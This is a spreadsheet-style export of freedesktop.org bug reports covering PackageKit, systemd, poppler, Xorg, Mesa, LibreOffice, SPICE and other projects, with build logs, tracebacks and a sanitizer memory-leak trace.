ulph's long-term proposal
I propose that the gconf-structure should be changed so that actions are in
separate directories where all entries are read (and written) at once. That way
it would be easy to distinguish an action from some other key. The current way
that actions are retreived from gconf is kind of awkward. Also this problem
would be easier to resolve. Do you think this is a good idea?
________
My (crankyjack's) transitional proposal
Putting [actions] into separate directories is logical plus it will make [them]
look much neater in gconf-editor. The trouble is that this change is almost as
big as the move to the action system was. It will break current settings and
requires new gconf schemas. So Plan B would be to change gconfGetOptionValue
so that it loads the four action options together. The change could be done as
follows:
    1. Move the ugly heuristics which determines plugin and option name in
lines 387--473 of gconfGetOptionValue to gconfKeyChanged.
    2. Merge gconfInitOption and the remainder of gconfGetOptionValue into a new
function gconfGetOption. It should take the same arguments as gconfInitOption
and load actions as a single entity. The function will have to synthesize the
gconf path to keys (the initial part of gconfInitOption) and call
gconf_client_get_entry.
    3. Call the new gconfGetOption from gconfKeyChanged and replace calls to
gconfInitOption with gconfGetOption.
I think this makes sense because gconfGetOption will do what its name says and
will better mirror gconfSetOption. What it does in the current state is better
described as gconfGetKey. Moreover the function will not change much when
(later) actions will get separate gconf directories.</t>
  </si>
  <si>
    <t>jan.kluka</t>
  </si>
  <si>
    <t>PACKAGEKIT-22708</t>
  </si>
  <si>
    <t>gpk-updaste-viewer hangs on scanning installed applications</t>
  </si>
  <si>
    <t>Overview: 
    After applying all updates the tool hangs on scanning installed applications. See screenshot.
Steps to Reproduce:
    I'm not sure what is causing this problem and how to start it. At some time something becomes inconsistent and it hangs.
    I had thoughts that the problem would be related to some extra yum plugins I have in my system but even disabling all plugins the problem persisted.
Actual Results: 
    In Fedora 10 the application hangs clicking on close button makes the window close but gpk-update-viewer remains running in background. I had to kill it manually.
    On Fedora 11 it has the same behavior but quitting the application seems to works around this issue.
    On Fedora 10 I could 'fix' the problem (apparently) setting ScanDesktopFiles=false' in /etc/PackageKit/PackageKit.conf and rebooting the machine.
Build Date &amp; Platform: 
  Fedora 10:   
    PackageKit-gstreamer-plugin-0.3.16-1.fc10.x86_64
    gnome-packagekit-0.3.14-1.fc10.x86_64
    PackageKit-yum-0.3.16-1.fc10.x86_64
    PackageKit-udev-helper-0.3.16-1.fc10.x86_64
    PackageKit-browser-plugin-0.3.16-1.fc10.x86_64
    PackageKit-yum-plugin-0.3.16-1.fc10.x86_64
    PackageKit-glib-0.3.16-1.fc10.x86_64
    PackageKit-0.3.16-1.fc10.x86_64
    PackageKit-docs-0.3.16-1.fc10.x86_64
    yum-metadata-parser-1.1.2-10.fc10.x86_64
    yum-3.2.23-3.fc10.noarch
    yum-utils-1.1.19-1.fc10.noarch
  Fedora 11:
    I dont have many information about Fedora 11 but attached a log from a friend of mine. Believe his machine was up to date with latest repo packages
Additional Information:
    Attached are log of packagekitd and gpk-update-viewer for Fedora 10 and gpk-update-viewer in Fedora 11.</t>
  </si>
  <si>
    <t>rotru</t>
  </si>
  <si>
    <t>SYSTEMD-55656</t>
  </si>
  <si>
    <t>systemd 194: pam_systemd Failed to create session: Invalid argument</t>
  </si>
  <si>
    <t>Starting with systemd-194 pam_systemd prints following error:
Oct 05 08:47:57 xxx sudo[6850]: pam_systemd(sudo:session): Asking logind to create session: uid=1000 pid=6850 service=sudo type=tty class=user seat=seat0 vtnr=7 tty=/dev/
Oct 05 08:47:57 xxx sudo[6850]: pam_systemd(sudo:session): Failed to create session: Invalid argument
Although command sudo still works su fails with similar error:
Oct 05 08:41:51 xxx su[8140]: pam_systemd(su:session): Asking logind to create session: uid=1000 pid=8140 service=su type=tty class=user seat=seat0 vtnr=7 tty=/dev/pts/8 
Oct 05 08:41:51 xxx su[8140]: pam_systemd(su:session): Failed to create session: Invalid argument
Oct 05 08:41:51 xxx su[8140]: pam_open_session: Cannot make/remove an entry for the specified session
Reverting to systemd-193 solves this problem.</t>
  </si>
  <si>
    <t>vovan</t>
  </si>
  <si>
    <t>POPPLER-32237</t>
  </si>
  <si>
    <t>Okular fails to render some mathematical symbols in PDF</t>
  </si>
  <si>
    <t>Created attachment 40929
Okular NOT showing mathematic symbols (+ = - etc.)
Okular is not able to show some mathematical symbols in this PDF:
http://dx.doi.org/10.1002/(SICI)1098-2760(199711)16:4%3C249::AID-MOP15%3E3.0.CO2-0
(I can provide the pdf for testing).
I suspect the problem might be in underlaying libraries since Mendeley Desktop
(http://www.mendeley.com/) shows the same problem.
Foxit reader 1.1.0 and Acrobat Reader 9.4 on the other hand can show them
just fine.
I'll be attaching some screenshots.</t>
  </si>
  <si>
    <t>nbigaouette</t>
  </si>
  <si>
    <t>XORG-18378</t>
  </si>
  <si>
    <t>Non-compiz compositing breaks xf86-video-savage XVideo colorkeying</t>
  </si>
  <si>
    <t>Observed in stock Fedora 8 xorg confirmed in latest git.
The xf86-video-savage driver uses colorkeying for its implementation of XVideo extension. Also this driver does not support compiz so I think compositing managers must use xrender in order to implement compositing when using this driver. When there is no compositing manager active the xv colorkeying works correctly in all applications (tested totem gst-launch pipe mplayer).
When a compositing manager is enabled (tested with internal metacity compositor) mplayer is not affected but gstreamer clients (gst-launch and totem) flash the video contents for an instant and then the video area is covered by garbage composed of old screen bitmaps. Sometimes dragging the video window makes the video content appear for an instant but while dragging the video area repeatedly flashes between the video content and garbage bitmaps. Somentimes when dropping the video window the video area remains normal but other times it is covered again by screen bitmaps.
Tested at 16bpp.</t>
  </si>
  <si>
    <t>POPPLER-100775</t>
  </si>
  <si>
    <t>poppler 0.54.0: memory leak in gmalloc</t>
  </si>
  <si>
    <t>Created attachment 131002
testcase
on poppler 0.54.0
The gmalloc function in  gmem.cc:110 which allows attackers to cause a denial of service (memory leak) via a crafted file.
#pdfinfo $FILE
=================================================================
==39456==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 9 byte(s) in 1 object(s) allocated from:
    #0 0x7f41c4bd3b58 in __interceptor_malloc ../../../../libsanitizer/asan/asan_malloc_linux.cc:62
    #1 0x59ca1f in gmalloc /home/haojun/Downloads/testopensourcecode/poppler/goo/gmem.cc:110
    #2 0x59cab5 in gmalloc /home/haojun/Downloads/testopensourcecode/poppler/goo/gmem.cc:120
    #3 0x59cf90 in copyString /home/haojun/Downloads/testopensourcecode/poppler/goo/gmem.cc:316
    #4 0x516ef8 in Object::initCmd(char*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Object.h:152
    #5 0x5169ee in Lexer::getObj(Object* int) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Lexer.cc:576
    #6 0x52b76f in Parser::Parser(XRef* Lexer* bool) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Parser.cc:53
    #7 0x5861c7 in XRef::parseEntry(long long XRefEntry*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1606
    #8 0x586eef in XRef::getEntry(int bool) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1681
    #9 0x5821de in XRef::fetch(int int Object* int) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1167
    #10 0x581e91 in XRef::getCatalog(Object*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1147
    #11 0x44e595 in Catalog::Catalog(PDFDoc*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Catalog.cc:110
    #12 0x52e4a1 in PDFDoc::setup(GooString* GooString*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/PDFDoc.cc:285
    #13 0x52db6c in PDFDoc::PDFDoc(GooString* GooString* GooString* void*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/PDFDoc.cc:169
    #14 0x65191e in LocalPDFDocBuilder::buildPDFDoc(GooString const&amp; GooString* GooString* void*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/LocalPDFDocBuilder.cc:31
    #15 0x53fd5e in PDFDocFactory::createPDFDoc(GooString const&amp; GooString* GooString* void*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/PDFDocFactory.cc:58
    #16 0x4079c9 in main /home/haojun/Downloads/testopensourcecode/poppler/utils/pdfinfo.cc:538
    #17 0x7f41c2ecfb34 in __libc_start_main (/lib64/libc.so.6+0x21b34)
Direct leak of 9 byte(s) in 1 object(s) allocated from:
    #0 0x7f41c4bd3b58 in __interceptor_malloc ../../../../libsanitizer/asan/asan_malloc_linux.cc:62
    #1 0x59ca1f in gmalloc /home/haojun/Downloads/testopensourcecode/poppler/goo/gmem.cc:110
    #2 0x59cab5 in gmalloc /home/haojun/Downloads/testopensourcecode/poppler/goo/gmem.cc:120
    #3 0x59cf90 in copyString /home/haojun/Downloads/testopensourcecode/poppler/goo/gmem.cc:316
    #4 0x516ef8 in Object::initCmd(char*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Object.h:152
    #5 0x5169ee in Lexer::getObj(Object* int) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Lexer.cc:576
    #6 0x52b76f in Parser::Parser(XRef* Lexer* bool) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Parser.cc:53
    #7 0x5861c7 in XRef::parseEntry(long long XRefEntry*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1606
    #8 0x586eef in XRef::getEntry(int bool) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1681
    #9 0x5821de in XRef::fetch(int int Object* int) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1167
    #10 0x582f44 in XRef::fetch(int int Object* int) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1278
    #11 0x581e91 in XRef::getCatalog(Object*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/XRef.cc:1147
    #12 0x44e595 in Catalog::Catalog(PDFDoc*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/Catalog.cc:110
    #13 0x52e4a1 in PDFDoc::setup(GooString* GooString*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/PDFDoc.cc:285
    #14 0x52db6c in PDFDoc::PDFDoc(GooString* GooString* GooString* void*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/PDFDoc.cc:169
    #15 0x65191e in LocalPDFDocBuilder::buildPDFDoc(GooString const&amp; GooString* GooString* void*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/LocalPDFDocBuilder.cc:31
    #16 0x53fd5e in PDFDocFactory::createPDFDoc(GooString const&amp; GooString* GooString* void*) /home/haojun/Downloads/testopensourcecode/poppler/poppler/PDFDocFactory.cc:58
    #17 0x4079c9 in main /home/haojun/Downloads/testopensourcecode/poppler/utils/pdfinfo.cc:538
    #18 0x7f41c2ecfb34 in __libc_start_main (/lib64/libc.so.6+0x21b34)
SUMMARY: AddressSanitizer: 18 byte(s) leaked in 2 allocation(s).
The $FILE poc in the attachment.
Credit:The bug was discovered by Haojun Hou in ADLab of Venustech.</t>
  </si>
  <si>
    <t>XORG-34195</t>
  </si>
  <si>
    <t>artifacts in awesome tiling manager</t>
  </si>
  <si>
    <t>Hi
since the release of the xf86-intel-video driver 2.14.0 I experienced 2 major Bugs using Awesome and urxvt also described here:
https://bugs.archlinux.org/task/22148
urxvt-related bugs have been fixed by the commit
da990536eca09c6de74627541cd56ecfad925eda - uxa: Undo damage translation before appending
but the artifacts on awesome still remained. The pre/after screenshots on the archlinux bug outlines the issues (I can provide own screenshots on demand). They occur with and w/o composite (using xcompmgr).
By testing out every commit between 2.13.0 and 2.14.0 I was able to track initial appearance of the issue to following commit:
3c5b1399e29ef577b8b91655b5e1c215d1b6dfbb - i915: Disable maximum state addresses
The issues doesn't occur on commits before this one.
My system:
Software: Gentoo x86_64 Mesa 7.10 Xorg-Server 1.9.4 xf86-video-intel git
Hardware: T410s with Mobile Core i5 540m arrandale integrated intel HD graphics</t>
  </si>
  <si>
    <t>DRI-33411</t>
  </si>
  <si>
    <t>X no longer works on the ASUS P5K-VM</t>
  </si>
  <si>
    <t>Created attachment 42371
Attachment when working
Hardware setup:
  ASUS P5K-VM
    ICH9
   82G33/G31 Express Integrated Graphics Controller (rev 02)
   DVI plug in card
In 2.6.32 the system works reliably with or without the plug in card providing dual channel
In 2.6.35 X fails. Interestingly (this is Fedora 14) you get the graphical bootup display just fine but not the X after it
Just pre 2.6.38-rc1 it oopses but the oops seems fixed
In 2.6.38-rc1 it's even worse and you don't get that either in fact the moment KMS triggers it goes to pot
I've tested both the failing case with our without dual monitors with or without monitors plugged in and from cold or warm boot. The behaviour is somewhat erratic - different kinds of fail etc.
Bisecting doesn't seem to help - it just produces a series of kernels that don't boot or fail due to other problems - seems the bisect distance is just too great to be useful.
It's not the userspace that makes the difference - FC14 X was used in all cases.
The box produces mtrr warnings but removing those by cutting down RAM etc don't change the behaviour</t>
  </si>
  <si>
    <t>LIBREOFFICE-43109</t>
  </si>
  <si>
    <t>PIVOTTABLE: DataPilot - Problem with leading zeros</t>
  </si>
  <si>
    <t>Problem description: 
A Column (Format code: Text) contains Numbers with leading zeros.
This column is the source for the datapilot but there the leading zeros aren`t shown.
The same problem exists if the numbers contain a leading +.
(No problems by using OpenOffice Calc).</t>
  </si>
  <si>
    <t>uwerettstadt</t>
  </si>
  <si>
    <t>MESA-101360</t>
  </si>
  <si>
    <t>Assertion failure comparing result of ballotARB</t>
  </si>
  <si>
    <t>Created attachment 131825
Piglit test reproducing the problem
When comparing a constant to the result of a call to the ballotARB function or a variable containing the result an assert in void glsl_to_tgsi_visitor::copy_propagate() can fail. If assertions are disabled then copy_propagate writes over the end of an allocation corrupting memory instead.
The attached patch to piglit adds a test reproducing the problem.
Steps to reproduce:
 1) Apply attached patch to piglit
 2) Run ./piglit run -t arb_shader_ballot shader results/ballot
    The newly added test will crash.
The test crashes with:
state_tracker/st_glsl_to_tgsi.cpp:4936: void glsl_to_tgsi_visitor::copy_propagate(): Assertion `inst-&gt;dst[0].file != PROGRAM_TEMPORARY || inst-&gt;dst[0].index next_temp' failed.
I'm using mesa ada3c3aa3da5d04bd597014dc1b5d4b028313513 with an AMD RX480.</t>
  </si>
  <si>
    <t>XORG-76088</t>
  </si>
  <si>
    <t>Crash while typing in GVim</t>
  </si>
  <si>
    <t>I'm using xorg-edgers PPA and recently on Ubuntu 13.10 and while I edit in GVim 7.4.131 the Xorg Server is crashing and I go to Logon screen.
I've noticed this is happening when I'm in Vim Insert mode and I click CAPS-LOCK which here is mapped to ESC key. Just upon releasing it crashes all the time. Console Vim doesn't suffer from same problem.</t>
  </si>
  <si>
    <t>oblita</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-1320</t>
  </si>
  <si>
    <t>bad definitions of text/x-calendar and text/x-vcard</t>
  </si>
  <si>
    <t>MIME type text/calendar is registered by IANA MIME type text/x-vcalendar is not
standardized and because it defines the same magic (at least in uppercase) it
causes conflict for determining local files.
MIME type text/directory is registered by IANA MIME type text/x-vcard is not
standardized and should not contain any glob or magic.
However RFC does not say anything about standard extension for text/directory
one of most commonly used is *.vcf mistakenly added to text/x-vcalendar.
How to fix it:
Move all entries for text/x-vcalendar to text/calendar.
Move all entries from text/x-vcard to text/directory.
Move  text/directory.
Related bug:
http://bugzilla.ximian.com/show_bug.cgi?id=65517</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-50924</t>
  </si>
  <si>
    <t>GPG key update</t>
  </si>
  <si>
    <t>Created attachment 62851
gpg key for account cloos
Please update my gpg key with this current export.
Thank you.</t>
  </si>
  <si>
    <t>UIM-40385</t>
  </si>
  <si>
    <t>uim-pref-qt4: failed to link with ld --as-needed</t>
  </si>
  <si>
    <t>Created attachment 50582
fix build with ld --as-needed
[ this is forwarded from http://bugs.debian.org/639320 ]
[ patch created by Julian Taylor  ]
the package uim fails to build when using the linker flag --as-needed
This is caused by the library libuim placed before the static 
libuim-counted-init library which needs its symbols.
ld will then drop libuim as it appears not needed.
attached patch fixes this by adding libuim again behind libuim-counted-init
------------------------------------------------------------------------------
* failed to link with ld --as-needed
% g++ -m64 -Wl-O1 -Wl--as-needed -o uim-pref-qt4 customwidgets.o qt4.o moc_customwidgets.o moc_qt4.o    -L/usr/src/uim/uim -L/usr/src/uim/replace -L/usr/src/uim/replace/.libs -L/usr/src/uim/uim/.libs -L/usr/lib -lreplace -luim -luim-scm -luim-x-util -luim-custom -luim-counted-init -lQtGui -lQtCore -lpthread
/usr/bin/ld: /usr/src/uim/uim/.libs/libuim-counted-init.a(libuim_counted_init_la-counted-init.o): undefined reference to symbol 'uim_init'
/usr/bin/ld: note: 'uim_init' is defined in DSO /usr/src/uim/uim/.libs/libuim.so so try adding it to the linker command line
/usr/src/uim/uim/.libs/libuim.so: could not read symbols: Invalid operation
collect2: ld returned 1 exit status
%
------------------------------------------------------------------------------
* succeeded to link with ld --as-needed (added -luim behind -luim-counted-init)
% g++ -m64 -Wl-O1 -Wl--as-needed -o uim-pref-qt4 customwidgets.o qt4.o moc_customwidgets.o moc_qt4.o    -L/usr/src/uim/uim -L/usr/src/uim/replace -L/usr/src/uim/replace/.libs -L/usr/src/uim/uim/.libs -L/usr/lib -lreplace -luim -luim-scm -luim-x-util -luim-custom -luim-counted-init -luim -lQtGui -lQtCore -lpthread
%</t>
  </si>
  <si>
    <t>d+bugzilla</t>
  </si>
  <si>
    <t>TELEPATHY-14670</t>
  </si>
  <si>
    <t>telepathy-butterfly crashed with NameError in _on_blob_received()</t>
  </si>
  <si>
    <t>chckens reported the following traceback in Launchpad (see the URL field):
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/pymsn/msnp2p/session_manager.py line 52 in 
    lambda tr blob: self._on_blob_received(blob))
  File /usr/lib/python2.5/site-packages/pymsn/msnp2p/session_manager.py line 155 in _on_blob_received
    elif isinstance(message.body SLPTransferRequestBody):
NameError: global name 'SLPTransferRequestBody' is not defined
Occurred after logging in to my MSN account with empathy
The crash is occuring in pymsn 0.3.1
Looking at the source it seems like SLPTransferRequestBody is completely missing in pymsn/msnp2p/SLP.py</t>
  </si>
  <si>
    <t>MESA-20898</t>
  </si>
  <si>
    <t>Screen blank when using compositeng window manager (compiz) 3D acceleration</t>
  </si>
  <si>
    <t>When I change window manager to compiz the desktop goes completely white (blank).  I can change desktop with the ctrl-alt-left ctrl-alt-right and ctrl-alt-down and I see the 3D cube effect but all the desktops are completely blank.  I have also tried the proprietary fglrx X server which works on initial start-up and the switch it compiz but crashes when the X server restarts (e.g. after a log out or ctrl-alt-bs).
The same set up works on two of my older systems (i86-32 with older Radeon AGP cards) with the same X server (from the xserver-xorg-video-radeon package) so I am not certain whether the problem is with the X server the 3D acceleration libgl1-mesa-glx or compiz.  But it seems to me that the 3D acceleration is the likely suspect though we must credit AMD/ATI Technologies for withholding documentation.
Some details about my system:
Toshiba Satelite L350D-01M (PSLE8C-01M012)
Debian 5.0 amd64 (lenny) with current packages.
lspci -v -n yields:
01:05.0 VGA compatible controller: ATI Technologies Inc RS780MC [Radeon HD 3100
Graphics] pci-id 1002:9613
The Xorg.0.log attached shows that the RADEON X server is loaded and AIGLX is enabled.
Would it be useful to install the debug version?
I am a reasonably sophisticated user and sometime programmer but not a major hacker so I could try some patches or provide more detailed reports with help from a developer.
It would be great to get compiz working an my laptop - it has closed the deal on four Debian GNU/Linux installs and I would like to move more.
Any help would be appreciated.</t>
  </si>
  <si>
    <t>infologue</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-3618</t>
  </si>
  <si>
    <t>CREATE Admin password not known</t>
  </si>
  <si>
    <t>The CREATE admin password was never created or I was never told the password.
I'm the main admin on the project and need the admin pass for the mailing list
to clear out spam and to change some settings.
Thanks!</t>
  </si>
  <si>
    <t>MESA-11588</t>
  </si>
  <si>
    <t>glGetShaderiv returns lenghts without null</t>
  </si>
  <si>
    <t>The glGetShaderiv function returns lengths (GL_INFO_LOG_LENGTH and GL_SHADER_SOURCE_LENGTH) without including the null terminating character (the spec says it should include it)</t>
  </si>
  <si>
    <t>jan.dvorak</t>
  </si>
  <si>
    <t>SPICE-45154</t>
  </si>
  <si>
    <t>spice-gtk --enable-vala fails to build on Debian/Ubuntu</t>
  </si>
  <si>
    <t>With either vala 0.14.1 or 0.15 and glib 2.31 on Ubuntu 12.04 Alpha amd64 (or on Debian unstable amd64 with glib 2.30.2 and vala 0.14.0) the gtk3 build of spice-gtk 0.8 fails when --enable-vala is used. (--enable-vala works with the gtk2 build but I don't have any need for that).
Full build log: http://fpaste.org/d4VC/
Excerpt of failure:
/spice-gtk-0.8/build-gtk3/vapi$ make V=1
/usr/bin/vapigen			\
		--library spice-client-glib-2.0	\
		../gtk/SpiceClientGLib-2.0.gir
SpiceClientGLib-2.0.gir:223.7-223.21: warning: Virtual method `Spice.Channel.open_fd' conflicts with method of the same name
      ^^^^^^^^^^^^^^^
Gio-2.0.gir:42638.7-42638.47: warning: Virtual method `G.Resolver.lookup_service_async' conflicts with method of the same name
      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Gio-2.0.gir:44031.7-44031.31: warning: Signal `G.Settings.change_event' conflicts with method of the same name
      ^^^^^^^^^^^^^^^^^^^^^^^^^
GLib-CRITICAL **: g_str_has_suffix: assertion `str != NULL' failed
** CRITICAL **: vala_gir_parser_node_lookup: assertion `name != NULL' failed
Gio-2.0.gir:54633.7-54633.25: warning: Virtual method `G.TlsPassword.set_value' conflicts with method of the same name
      ^^^^^^^^^^^^^^^^^^^
Gio-2.0.gir:56225.7-56229.24: error: `UnixSocketAddress' already contains a definition for `abstract'
Gio-2.0.gir:56097.7-56099.103: note: previous definition of `abstract' was here
Generation failed: 1 error(s) 4 warning(s)
make: *** [spice-client-glib-2.0.vapi] Error 1</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-20250</t>
  </si>
  <si>
    <t>freedesktop bug database uses certificate signed by CA not recognized by Mozilla</t>
  </si>
  <si>
    <t>If I want to use b.fd.o I have to click through a few strongly-worded warning screens to do so -- not cool.  (I've set up a temporary exception for now definitely not adding a permanent exception given that I don't use this bugzilla all that much and would rather not grant carte blanche to a cert signed by a CA Mozilla doesn't trust yet.)
You should use a certificate signed by a CA that 80-90% of the browsing world will recognize rather than one that Apple (via Safari) Microsoft (via IE7) and Mozilla (via Firefox) at a minimum will not accept.  That's just desensitizing users to blindly accept a certificate that in an inauspicious environment with active MITM happening might not even be this site's certificate.</t>
  </si>
  <si>
    <t>jwalden+bfo</t>
  </si>
  <si>
    <t>XORG-6789</t>
  </si>
  <si>
    <t>modular xorg-server does not build XDarwin at all</t>
  </si>
  <si>
    <t>[shadesofgray:xorg/hw/darwin] root# pwd
/Source/xorg/xserver/xorg/hw/darwin
[shadesofgray:xorg/hw/darwin] root# make clean
rm -rf .libs _libs
rm -f *.lo
[shadesofgray:xorg/hw/darwin] root# make
make: Nothing to be done for `all'.
leaving one with no x window system
all that is contained within the Makefile.am is EXTRA_DIST which doesn't do
much on it's own</t>
  </si>
  <si>
    <t>ephraim_owns</t>
  </si>
  <si>
    <t>SPICE-91405</t>
  </si>
  <si>
    <t>virt-viewer</t>
  </si>
  <si>
    <t>multimonitor VM keeps resizing after connection</t>
  </si>
  <si>
    <t>When I connect to a RHEL6.7 VM running locally it keeps resizing for a while.
upstream versions of all the components
Fedora 23 Xfce (rawhide) as a host &amp; client
spice-gtk v0.29
virt-viewer (gtk3) 2.0
Steps to reproduce:
1. configure the VM to have two monitors (2x 800x600)
2. connect to the VM
Additional info:
I could not reproduce the issue in gnome shell or with gtk2 version.</t>
  </si>
  <si>
    <t>pavelgrunt</t>
  </si>
  <si>
    <t>PIGLIT-78421</t>
  </si>
  <si>
    <t>ImportError: No module named piglit-run</t>
  </si>
  <si>
    <t>piglit: c604bee4b76f1a299a2a34122a7957d86672a1cd (master)
$ ./piglit-run.py tests/sanity.py results/sanity
Traceback (most recent call last):
  File ./piglit-run.py line 32 in 
    run(sys.argv)
  File piglit/framework/programs/run.py line 161 in run
    profile = framework.profile.merge_test_profiles(args.test_profile)
  File piglit/framework/profile.py line 242 in merge_test_profiles
    profile.update(loadTestProfile(p))
  File piglit/framework/profile.py line 220 in loadTestProfile
    os.path.splitext(os.path.basename(filename))[0]))
  File /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/importlib/__init__.py line 37 in import_module
    __import__(name)
ImportError: No module named piglit-run
9b1e7da290cd612690e85bcacc99b50c65d83fe6 is the first bad commit
commit 9b1e7da290cd612690e85bcacc99b50c65d83fe6
Author: Dylan Baker 
Date:   Fri May 2 00:23:28 2014 -0700
    framework: move executable functions to modules
    This moves piglit-run and piglit-resume main() functions to
    framework.programs.run as run() and resume() respectively and moves
    piglit-summary-* to framework.programs.summary. It then creates
    compatibility wrappers as piglit-*.py for the functions.
    This is groundwork for a combined piglit interface. The original files
    could not be imported directly since they have dash (-) in their name
    and python considers dash an illegal character for function class and
    modules names and python would raise an ImportError when attempting to
    import one of them.
    Signed-off-by: Dylan Baker 
    Reviewed-by: Jordan Justen 
:040000 040000 082be229aa133f2dab84984b662b9818194cc8db b8081817efa35efcd21a8039ea85510797a9f764 M	framework
:100755 100755 638d63ac3d8214877d600a7f5664b8154328f363 68c546ddfa8d9de49bec234f0f03178a7556d3e6 M	piglit-resume.py
:100755 100755 e5b1b438137e3a95d8c75fc414b287a5d50a207d fd7cd72b37c4529c7e17e906033b94bbd7f2d6f5 M	piglit-run.py
:100755 100755 58b6823a451e3e2c908a501bab82d974daf2880d 92a350d0d52e47859e456ee2a58533098a45ee43 M	piglit-summary-html.py
:100755 100755 6dba1527382a84b534a4ce8f256c79f543fce529 31c66d36539135c012ba4f7ed4724832f26d690f M	piglit-summary-junit.py
:100755 100755 fe58e400befc1f808df09ec3813bb466d923ff88 b4979962131b3556a0f76e5a8997623d6a4cb3c0 M	piglit-summary.py
bisect run success</t>
  </si>
  <si>
    <t>MESA-43418</t>
  </si>
  <si>
    <t>Resolving the HiZ buffer fails when using a GLES API</t>
  </si>
  <si>
    <t>When resolving the HiZ buffer Mesa uses the meta API with some internal GL calls. However when using GLES this fails because it tries to bind a renderbuffer to GL_DRAW_FRAMEBUFFER but Mesa asserts that this binding point is only used when the API is GL.
I'm attaching a patch but I'm not sure if it's the best solution because I've copied the condition for whether GL_DRAW_FRAMEBUFFER is allowed into gen6_hiz.c. This could be quite awkward to maintain. For example if Mesa ever gets support for the GL_ANGLE_framebuffer_blit extension then we'd have to remember to change this check in two places.
I wonder if the check should just be removed instead? Mesa already lets you bind to GL_DRAW_FRAMEBUFFER just not add a renderbuffer so it's already not completely validated.</t>
  </si>
  <si>
    <t>LIBREOFFICE-61525</t>
  </si>
  <si>
    <t>Unprotected cell remains locked even after Cell Protection is unchecked.</t>
  </si>
  <si>
    <t>Unprotected cell remains locked even after Cell Protection is unchecked in Cell Format and Sheet Protected.
1. I formatted a cell and unchecked protection.
2. Then I protected the Sheet with and without a password.
3. The unprotected cell remains protected and is uneditable.
LibreOffice 4.0 installed and then OpenOffice 3.4 uninstalled.
The same scenario emulated in MSOffice 2003 and it works fine.</t>
  </si>
  <si>
    <t>batayub</t>
  </si>
  <si>
    <t>SPICE-40045</t>
  </si>
  <si>
    <t>Server should clear keyboard state on client disconnect</t>
  </si>
  <si>
    <t>Without this something like the following can happen:
1) client connects
2) client sends alt press key event
3) client disconnects without any cleanup (kill -9 it to reproduce)
4) Another client connects
5) guest still think alt is pressed
6) All key presses register as alt-foo</t>
  </si>
  <si>
    <t>XORG-13192</t>
  </si>
  <si>
    <t>please add support of radeon x2300 to drivers</t>
  </si>
  <si>
    <t>please add support of my x2300 mobility radeon (M64S) to radeonhd drivers. i succesfully modified utility rhd_conntest and now it recognizes my card:
localhost conntest # ./rhd_conntest 1:0.0
rhd_conntest: version 0.0.2 built from git branch master commit e9c24f66.. + changes
Checking connectors on 0x7188 0x144D 0xC515  (@01:00:00):
  Load Detection: RHD_OUTPUT_NONE
  HotPlug: RHD_HPD_NONE
  DDC: RHD_DDC_1 RHD_DDC_2
  LVDS Info:
        18bits single link LDI Panel found.
        Power Timing: 0xF9F 0x012 0x03 0x19 0x1F4
        Macro: 0x0B520407 Clock Pattern: 0x0063
  DDC Line[1]: Slaves: 10 12 14 16 18 1a 1c 1e 20 22 24 26 28 2a 2c 2e 30 32 34 36 38 3a 3c 3e 40 42 44 46 48 4a 4c 4e 50 52 54 56 58 5a 5c 5e 60 62 64 66 68 6a 6c 6e 70 72 74 76 78 7a 7c 7e 80 82 84 86 88 8a 8c 8e 90 92 94 96 98 9a 9c 9e a0 a2 a4 a6 a8 aa ac ae b0 b2 b4 b6 b8 ba bc be c0 c2 c4 c6 c8 ca cc ce d0 d2 d4 d6 d8 da dc de e0 e2 e4 e6 e8 ea ec ee
but my tries to modify drivers was not succesfull and in xorg logs i still see only one error message (EE) Device not found (proprietary drivers 8.40.4 doesn't works too). below is some additional information about card:
localhost conntest # hwinfo --gfxcard
26: PCI 100.0: 0300 VGA compatible controller (VGA)
  [Created at pci.288]
  Unique ID: VCu0.i1U55UNewxA
  Parent ID: _Znp.IOaVMBVNBp3
  SysFS ID: /devices/pci0000:00/0000:00:02.0/0000:01:00.0
  SysFS BusID: 0000:01:00.0
  Hardware Class: graphics card
  Model: Samsung Electronics VGA compatible controller
  Vendor: pci 0x0001
  Device: pci 0x7188
  SubVendor: pci 0x144d Samsung Electronics Co Ltd
  SubDevice: pci 0xc515
  Memory Range: 0xd0000000-0xd7ffffff (rwprefetchable)
  I/O Ports: 0x9000-0x9fff (rw)
  Memory Range: 0xd8000000-0xd800ffff (rwnon-prefetchable)
  Memory Range: 0xd8020000-0xd803ffff (roprefetchabledisabled)
  IRQ: 5 (no events)
  I/O Ports: 0x3c0-0x3df (rw)
  Module Alias: pci:v00000001d00007188sv0000144Dsd0000C515bc03sc00i00
  Config Status: cfg=new avail=yes need=no active=unknown
  Attached to: #10 (PCI bridge)
Primary display adapter: #26
localhost conntest # lspci -vvv
